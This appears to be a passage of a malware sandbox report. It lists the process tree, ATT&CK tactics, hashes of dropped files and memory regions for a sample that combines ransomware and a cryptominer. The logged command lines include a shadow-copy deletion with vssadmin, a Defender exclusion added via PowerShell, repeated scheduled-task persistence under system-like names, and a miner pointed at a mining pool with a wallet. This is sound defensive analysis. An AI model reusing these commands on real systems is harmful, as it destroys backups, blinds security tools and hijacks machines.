Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"
- Suspicious use of WriteProcessMemory
PID: 6136

Depth 6: C:\Windows\system32\schtasks.exe
Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"
- Creates scheduled task(s)
PID: 4040

Depth 5: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFLLB2JSF2jF32LXcusk7Mo9bvC7o8WbPt.work -p x -t 10
PID: 3752

Depth 6: C:\Windows\system32\cmd.exe
Command line: C:\Windows\system32\cmd.exe /c cls
PID: 1676

Depth 4: C:\Users\Admin\AppData\Local\Temp\h.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\h.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID: 3932

Depth 5: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Command line: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 4056

Depth 6: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
PID: 4956

Depth 7: C:\Windows\system32\vssadmin.exe
Command line: vssadmin.exe delete shadows /all /quiet
- Interacts with shadow copies
PID: 5348

Depth 6: C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
- Suspicious use of WriteProcessMemory
PID: 5740

Depth 7: C:\Windows\system32\vssadmin.exe
Command line: vssadmin.exe delete shadows /all /quiet
- Interacts with shadow copies
PID: 5800

Depth 4: C:\Users\Admin\AppData\Local\Temp\mm.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\mm.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID: 5260

Depth 5: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 5380

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 220

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 1752

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 5032

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 3240

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4116

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4084

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 2748

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4672

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4892

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 3888

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4612

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4760

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\System.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 540

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Security\System.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4224

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\System.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 1300

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\winlogon.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 2440

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4932

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4948

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\dllhost.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 5108

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\CbsTemp\dllhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 4984

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Windows\CbsTemp\dllhost.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 1680

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 1584

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 2084

Depth 1: C:\Windows\system32\schtasks.exe
Command line: schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Creates scheduled task(s)
PID: 3696

Depth 1: C:\Windows\system32\vssvc.exe
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID: 4632

Depth 1: C:\Windows\system32\vssvc.exe
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID: 5508

Network
MITRE ATT&CK Enterprise v6
Defense Evasion
- Bypass User Account Control (1)
- Disabling Security Tools (1)
- File Deletion (2)
- Modify Registry (2)
- Scripting (1)
- Virtualization/Sandbox Evasion (1)

Downloads
- C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe
  Filesize: 2.3MB
  MD5: ec50388a69792d133c1298e1dceb40a6
  SHA1: 80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
  SHA256: bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
  SHA512: fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
- C:\Recovery\WindowsRE\RCX9F97.tmp
  Filesize: 2.3MB
  MD5: 8058f8123153d8ec14b8e46d48dea44e
  SHA1: 17f18234fdd7defc8cbbd01533a2f1a094fb4f5d
  SHA256: e1f31b94a4e6d8293b7fb5c7a31e05462150b079dbe42079ca5d22bb9b6fab59
  SHA512: e456e9603dbe717f6b743bb0c4634ded1bdcf87df7b16a0287bafb2d18d95aed73353d561cd7b04a045a70975a76ba62df0a0f6ee755adb033f0de7978c52e64
- C:\Recovery\WindowsRE\backgroundTaskHost.exe
  Filesize: 2.3MB
  MD5: ec50388a69792d133c1298e1dceb40a6
  SHA1: 80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
  SHA256: bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
  SHA512: fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
- C:\Recovery\WindowsRE\eddb19405b7ce1
  Filesize: 1KB
  MD5: ffcedf515e531d74f5799d21741f5d07
  SHA1: cdd349adfa3a4644d86a4a1052a6d7c9e918f55c
  SHA256: c05e7534f76a611dfbf29dd8fff40a65264812bda8630b1290090846baa90651
  SHA512: a02dbf221e073db6ff14ed8f88293939500495a55d49b9bbd041e1dbef6d6aa2c12510f922e1ee0faa0b5f96816cd52d56f0840a19aa71b5b87098c96a1fe10d
- C:\Recovery\WindowsRE\f3b6ecef712a24
  Filesize: 748B
  MD5: 18e3300114651ae5830d46a77b59f095
  SHA1: a9b55afd5d24a503f7c385a6ea55a15704862e36
  SHA256: 2cfa5da54fbf5837fbb25bc002b338a302f13b70d6fb9f73ac48444d42ce3da9
  SHA512: 9775f4838027604de1b32381d16552a5e9b3cbef054e15529af2833a238e84ccac7cbcfa940a399cfb0b7fe8a0d70f89049645d640c8df90446b2b8eddf929d1
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ec50388a69792d133c1298e1dceb40a6.exe.log
  Filesize: 1KB
  MD5: e1b159e530af554c42b6b6f3aefbd4de
  SHA1: 281d3767129c8aa8fc8867515578dee1eb7f39ba
  SHA256: 94b7640dce6d228f0d89f1d504c7143397ffa2af6adf910b501d9d51583f463e
  SHA512: f373930c1dfab5e3029af93880c2f3bfc16413aaa28a563d4b953f93066facfe1ee1213e5facb6b92df79b2b3d2a2866df7c15fa2d6fe0a359186688aa7e99f0
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 3d086a433708053f9bf9523e1d87a4e8
  SHA1: b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
  SHA256: 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
  SHA512: 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 5a39d91e076fe4593c08a47f56e52460
  SHA1: ef1617b70640079e9988e81477b6b9e01711b4dc
  SHA256: 1440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183
  SHA512: af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 41e904e39f05513fbea3f2cc85f6bb80
  SHA1: 43a088c467f6a72a3a342f9f4d5d5a6df31e03d5
  SHA256: 277bd2da142f7d10c5c44d4c788f9ecdc9ca12481e4d0984ba7fb3895faf4a80
  SHA512: ae866df670c7c5b6a2ce8e71aaf926b2a0e29450902285839f6161b7440b920401608d6087c6974ff7394dd135df65c4d5b908c0798a6caf954277b368c30287
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 2802c3222bfdefd47336d3cdc87791d9
  SHA1: e87893c5e06b9abec3f77f20b7d3f2dc8eac2ccc
  SHA256: 7706f631c7b9f827a3dc15e578fc5c0030df9248a93efa4b428853b3081c5c7d
  SHA512: 51ce77cc1449fab6e857014fc5fec8331c18bc54f1f6c9eb1a6a88bbd259250d93204da05a750b15c27700ce88d134a85f5a01318e87111cde0aa09aea69c742
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: fdd2b2888041dfa29fc0f255221f9144
  SHA1: f62a63011217f85374ebc36cd53536b18fc5093a
  SHA256: 7ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32
  SHA512: 3d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 9b80cd7a712469a4c45fec564313d9eb
  SHA1: 6125c01bc10d204ca36ad1110afe714678655f2d
  SHA256: 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
  SHA512: ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
- C:\Users\Admin\AppData\Local\Temp\ElJlpTTjQF
  Filesize: 46KB
  MD5: 02d2c46697e3714e49f46b680b9a6b83
  SHA1: 84f98b56d49f01e9b6b76a4e21accf64fd319140
  SHA256: 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
  SHA512: 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
- C:\Users\Admin\AppData\Local\Temp\Km2JpwhXKY
  Filesize: 112KB
  MD5: 780853cddeaee8de70f28a4b255a600b
  SHA1: ad7a5da33f7ad12946153c497e990720b09005ed
  SHA256: 1055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3
  SHA512: e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8
- C:\Users\Admin\AppData\Local\Temp\O7vGYvM0zP
  Filesize: 92KB
  MD5: 721d9e468a6d6d0276d8d0e060e4e57b
  SHA1: 62c635bf0c173012301f195a7d0e430270715613
  SHA256: 0be20bbaa9d80dfefd3038e5c7904d4b426719607c563254ec42500d704021f0
  SHA512: 0af08f0f5ecda8cdaaaba317f16e835032797e4e6e64f3f4e5b0bb8fd20f1afd9e8e2ca50b549e1c1a48a26ff02f59bc8212deb354b095294c97016a3c9dbb12
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfshjvnb.0eh.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe
  Filesize: 2.3MB
  MD5: ec50388a69792d133c1298e1dceb40a6
  SHA1: 80ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
  SHA256: bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
  SHA512: fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
- C:\Users\Admin\AppData\Local\Temp\h.exe
  Filesize: 193KB
  MD5: eff03153e4a2444ee03ca0f283156102
  SHA1: 4409d4d91bba5a24f2aeff1d00ccf77aa64d2157
  SHA256: 8deb203aaf30f729274bf31408ee7606631686a056b2fd815f5cd219586f8f7e
  SHA512: caaf9cc47ddba3560230cb01a3b4914c42c4decb04ecb5ab1518d62f41530923625226decc2615815969ac6551ec28aced8b86d8c2735666cef4682ee85cb2f9
- C:\Users\Admin\AppData\Local\Temp\k5od7j47kP
  Filesize: 20KB
  MD5: c9ff7748d8fcef4cf84a5501e996a641
  SHA1: 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
  SHA256: 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
  SHA512: d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
- C:\Users\Admin\AppData\Local\Temp\m.exe
  Filesize: 898KB
  MD5: b6528ddfaa0755893d7b3b701ee6c004
  SHA1: ccf0216ca6a658c46c16400cbed9293065525ef0
  SHA256: 1dc6dbd75812f620245d8b426786e5dd469218d3ce24588924fe1e5f7d41657c
  SHA512: 012a521d84961c457bd22efaf859a5786f887a56abe470e25b3942130bf96a9bdb63cd2d871a459cccfebd9b523718f4c8add9c9003be683dad16f4f4efed035
- C:\Users\Admin\AppData\Local\Temp\mm.exe
  Filesize: 897KB
  MD5: 78029b39d00f6b56e28b23d5a87c7105
  SHA1: 3aae15ba1f05a0942ad3036b5272d6dd9d459886
  SHA256: c5dd221d14f063b4c3d59e80660af8eac1422d9d4e687c1fd7f70323a38a6456
  SHA512: b165743e3428e9d78c99965bb4eaad507807c3cc37f267a3acdc4e32afbf6e24811b57e371711f7cd06af26ab6be6e388eeaa84b8eaff714e15964a719222a93
- C:\Users\Default\cc11b995f2a76d
  Filesize: 384B
  MD5: 51453654d80c3f42a158c86bd53e44d8
  SHA1: f9e2cea084760d87a6d48c8030ff21e3bb18d833
  SHA256: d30a365762e45777524278e7bd94e19dfab49d91681d0c5f4597ba95122e0421
  SHA512: 38082e2adaa0b276bab78de8f246b0065aeee1630ac574a498fb14ada450b20000d0778e32e3b820da8a0b0516a24eaf9b49e645b272bc227c679ae8c67a1eba
- C:\Users\Public\Music\eddb19405b7ce1
  Filesize: 943B
  MD5: 91a6496b43d11920a6188a33fc2b3f39
  SHA1: 0bee0d773403b7ec67e5eaec74670ed459dcf81b
  SHA256: 44c75662ea6bde6ba813b381c31a9e7f477036d7ee2f0a08b932bc9cf30d1bd1
  SHA512: 6f502056196b6f67817f2634c8235ffb2a05030475317b9c151529f6e8385057a54b0a6da56ccc66ad3f202fff7edd7439b6227c7837b6b022ea55a6351bdf59
- C:\odt\How To Restore Your Files.txt
  Filesize: 272B
  MD5: 9cee3cd6590c1a7902e92daf03ef467b
  SHA1: ef31096205e95601d124de1e69652a24fb0a0968
  SHA256: bf6b4f9ea83f59043027605234c5af52e9146e8903816175cefdd33af148549d
  SHA512: 13d94c5bf381616ffd41108b81d712bb1fd8f0c7729d09518893deb316555ea7c46a84c4985af9b20e51d40f8890ed7045a7faf1f9026aa499fdf0e5bd7aa07e
- memory/692-198-0x00000000048C0000-0x00000000048D0000-memory.dmp (Filesize: 64KB)
- memory/692-245-0x00000000048C0000-0x00000000048D0000-memory.dmp (Filesize: 64KB)
- memory/692-194-0x0000000004B90000-0x0000000004BB2000-memory.dmp (Filesize: 136KB)
- memory/692-292-0x00000000075A0000-0x0000000007C1A000-memory.dmp (Filesize: 6.5MB)
- memory/692-296-0x00000000049D0000-0x00000000049DA000-memory.dmp (Filesize: 40KB)
- memory/692-250-0x000000006FA20000-0x000000006FA6C000-memory.dmp (Filesize: 304KB)
- memory/692-298-0x00000000071A0000-0x00000000071AE000-memory.dmp (Filesize: 56KB)
- memory/692-196-0x00000000048C0000-0x00000000048D0000-memory.dmp (Filesize: 64KB)
- memory/692-291-0x000000007F8D0000-0x000000007F8E0000-memory.dmp (Filesize: 64KB)
- memory/692-239-0x0000000005C50000-0x0000000005C6E000-memory.dmp (Filesize: 120KB)
- memory/692-248-0x0000000006BE0000-0x0000000006C12000-memory.dmp (Filesize: 200KB)
- memory/692-192-0x0000000002670000-0x00000000026A6000-memory.dmp (Filesize: 216KB)
- memory/1636-133-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/1636-243-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/1636-139-0x0000000005580000-0x0000000005590000-memory.dmp (Filesize: 64KB)
- memory/1636-140-0x0000000005D90000-0x0000000005DE0000-memory.dmp (Filesize: 320KB)
- memory/1636-141-0x0000000005E90000-0x0000000005F22000-memory.dmp (Filesize: 584KB)
- memory/1636-142-0x0000000006D30000-0x000000000725C000-memory.dmp (Filesize: 5.2MB)
- memory/1636-138-0x0000000006150000-0x00000000066F4000-memory.dmp (Filesize: 5.6MB)
- memory/1636-137-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/1636-145-0x0000000006A90000-0x0000000006AF6000-memory.dmp (Filesize: 408KB)
- memory/1912-249-0x000000006FA20000-0x000000006FA6C000-memory.dmp (Filesize: 304KB)
- memory/1912-193-0x0000000005160000-0x0000000005788000-memory.dmp (Filesize: 6.2MB)
- memory/1912-204-0x00000000025C0000-0x00000000025D0000-memory.dmp (Filesize: 64KB)
- memory/1912-238-0x00000000025C0000-0x00000000025D0000-memory.dmp (Filesize: 64KB)
- memory/1912-304-0x0000000007360000-0x0000000007368000-memory.dmp (Filesize: 32KB)
- memory/1912-261-0x00000000062D0000-0x00000000062EE000-memory.dmp (Filesize: 120KB)
- memory/1912-290-0x000000007EFC0000-0x000000007EFD0000-memory.dmp (Filesize: 64KB)
- memory/2180-438-0x00000000026D0000-0x00000000026E0000-memory.dmp (Filesize: 64KB)
- memory/2180-507-0x000000006FAD0000-0x000000006FB1C000-memory.dmp (Filesize: 304KB)
- memory/2180-538-0x00000000026D0000-0x00000000026E0000-memory.dmp (Filesize: 64KB)
- memory/2380-247-0x00000000023E0000-0x00000000023F0000-memory.dmp (Filesize: 64KB)
- memory/2380-297-0x0000000007360000-0x00000000073F6000-memory.dmp (Filesize: 600KB)
- memory/2380-280-0x000000006FA20000-0x000000006FA6C000-memory.dmp (Filesize: 304KB)
- memory/2380-195-0x0000000005500000-0x0000000005566000-memory.dmp (Filesize: 408KB)
- memory/2380-295-0x000000007F3B0000-0x000000007F3C0000-memory.dmp (Filesize: 64KB)
- memory/2380-210-0x00000000023E0000-0x00000000023F0000-memory.dmp (Filesize: 64KB)
- memory/3104-293-0x000000007FAE0000-0x000000007FAF0000-memory.dmp (Filesize: 64KB)
- memory/3104-300-0x0000000007920000-0x000000000793A000-memory.dmp (Filesize: 104KB)
- memory/3104-294-0x00000000075C0000-0x00000000075DA000-memory.dmp (Filesize: 104KB)
- memory/3104-221-0x0000000002CE0000-0x0000000002CF0000-memory.dmp (Filesize: 64KB)
- memory/3104-246-0x0000000002CE0000-0x0000000002CF0000-memory.dmp (Filesize: 64KB)
- memory/3104-251-0x000000006FA20000-0x000000006FA6C000-memory.dmp (Filesize: 304KB)
- memory/3104-197-0x0000000002CE0000-0x0000000002CF0000-memory.dmp (Filesize: 64KB)
- memory/3116-540-0x0000000005670000-0x0000000005680000-memory.dmp (Filesize: 64KB)
- memory/3116-501-0x0000000000930000-0x0000000001006000-memory.dmp (Filesize: 6.8MB)
- memory/3116-506-0x0000000000930000-0x0000000001006000-memory.dmp (Filesize: 6.8MB)
- memory/3336-436-0x0000000003020000-0x0000000003030000-memory.dmp (Filesize: 64KB)
- memory/3336-437-0x0000000003020000-0x0000000003030000-memory.dmp (Filesize: 64KB)
- memory/3336-541-0x000000007F960000-0x000000007F970000-memory.dmp (Filesize: 64KB)
- memory/3336-508-0x000000006FAD0000-0x000000006FB1C000-memory.dmp (Filesize: 304KB)
- memory/3336-528-0x0000000003020000-0x0000000003030000-memory.dmp (Filesize: 64KB)
- memory/3752-1019-0x0000000140000000-0x00000001400C6000-memory.dmp (Filesize: 792KB)
- memory/3752-1020-0x0000000140000000-0x00000001400C6000-memory.dmp (Filesize: 792KB)
- memory/3752-1021-0x0000000140000000-0x00000001400C6000-memory.dmp (Filesize: 792KB)
- memory/4056-1001-0x0000000000DA0000-0x0000000000DB8000-memory.dmp (Filesize: 96KB)
- memory/4056-711-0x0000000000DA0000-0x0000000000DB8000-memory.dmp (Filesize: 96KB)
- memory/4056-710-0x0000000000DA0000-0x0000000000DB8000-memory.dmp (Filesize: 96KB)
- memory/4056-703-0x0000000000DA0000-0x0000000000DB8000-memory.dmp (Filesize: 96KB)
- memory/4056-993-0x0000000000DA0000-0x0000000000DB8000-memory.dmp (Filesize: 96KB)
- memory/4080-440-0x0000000003290000-0x00000000032A0000-memory.dmp (Filesize: 64KB)
- memory/4080-518-0x000000006FAD0000-0x000000006FB1C000-memory.dmp (Filesize: 304KB)
- memory/4080-441-0x0000000003290000-0x00000000032A0000-memory.dmp (Filesize: 64KB)
- memory/4080-539-0x0000000003290000-0x00000000032A0000-memory.dmp (Filesize: 64KB)
- memory/4256-439-0x0000000004BD0000-0x0000000004BE0000-memory.dmp (Filesize: 64KB)
- memory/4452-244-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/4452-305-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/4452-315-0x00000000055A0000-0x00000000055B0000-memory.dmp (Filesize: 64KB)
- memory/4452-374-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/4452-502-0x0000000000390000-0x0000000000A66000-memory.dmp (Filesize: 6.8MB)
- memory/4868-442-0x0000000002740000-0x0000000002750000-memory.dmp (Filesize: 64KB)
- memory/4868-499-0x0000000002740000-0x0000000002750000-memory.dmp (Filesize: 64KB)